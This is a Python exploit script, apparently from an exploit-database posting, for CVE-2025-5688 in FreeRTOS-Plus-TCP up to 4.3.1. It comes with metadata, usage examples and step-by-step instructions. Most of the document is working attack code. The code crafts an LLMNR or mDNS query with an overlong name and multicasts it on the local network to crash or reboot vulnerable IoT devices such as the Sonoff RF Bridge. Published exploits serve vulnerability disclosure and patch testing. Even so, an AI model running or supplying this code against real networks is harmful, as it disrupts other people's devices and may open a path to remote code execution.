#!/usr/bin/env python3
# Exploit Title:        FreeRTOS-Plus-TCP <= 4.3.1 Out-of-Bounds Write in LLMNR/mDNS Name Parsing
# CVE:                  CVE-2025-5688
# Date:                 2025-12-26
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:
# Vendor Homepage:      https://www.freertos.org
# Software Link:        https://github.com/FreeRTOS/FreeRTOS-Plus-TCP
# Affected:
#   FreeRTOS-Plus-TCP <= 4.3.1
#   LLMNR or mDNS enabled
#   Buffer Allocation Scheme 1
# Tested on:            Sonoff RF Bridge (vulnerable firmware), custom FreeRTOS devices
# Category:             Remote
# Platform:             Embedded / IoT
# Exploit Type:         Denial of Service / Potential Remote Code Execution
# CVSS:                 8.4 (High)
# Description:          Out-of-bounds write when parsing very long DNS names in LLMNR or mDNS queries
# Fixed in:             FreeRTOS-Plus-TCP 4.3.2
# Usage:
#   python3 exploit.py [LLMNR|mDNS] [optional multicast IP]
#
# Examples:
#   python3 exploit.py LLMNR
#   python3 exploit.py mDNS 224.0.0.251
#
# Options:
#   --
#
# Notes:
#   • Triggers crash/reboot on many unpatched Sonoff RF Bridge devices and similar IoT hardware
#   • Requires target to be on the same LAN and have LLMNR or mDNS enabled
#
# How to Use
#
# Step 1: Place the vulnerable device (e.g. Sonoff RF Bridge) on the same local network
#
# Step 2: Run the script targeting LLMNR or mDNS multicast address
#
# ────────────────────────────────────────────────

import socket
import sys

def send_overlong_name(target_multicast="224.0.0.252", port=5355, protocol="LLMNR"):
    labels = []
    for i in range(8):
        labels.append(b"\x3f" + b"A" * 63)
    long_qname = b"".join(labels) + b"\x00"

    header = (
        b"\xaa\xbb"
        b"\x00\x00"
        b"\x00\x01"
        b"\x00\x00"
        b"\x00\x00"
        b"\x00\x00"
    )

    question = long_qname + b"\x00\x01\x00\x01"

    packet = header + question

    print(f"[+] Sending {len(packet)}-byte {protocol} query → target {target_multicast}:{port}")

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.sendto(packet, (target_multicast, port))
    print("[+] Sent. Watch for immediate crash, reboot, LED blink loop, or freeze.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 exploit.py [LLMNR|mDNS] [optional multicast IP]")
        sys.exit(1)

    proto = sys.argv[1].upper()
    multicast = "224.0.0.252" if proto == "LLMNR" else "224.0.0.251"
    port = 5355 if proto == "LLMNR" else 5353

    if len(sys.argv) > 2:
        multicast = sys.argv[2]

    send_overlong_name(multicast, port, proto)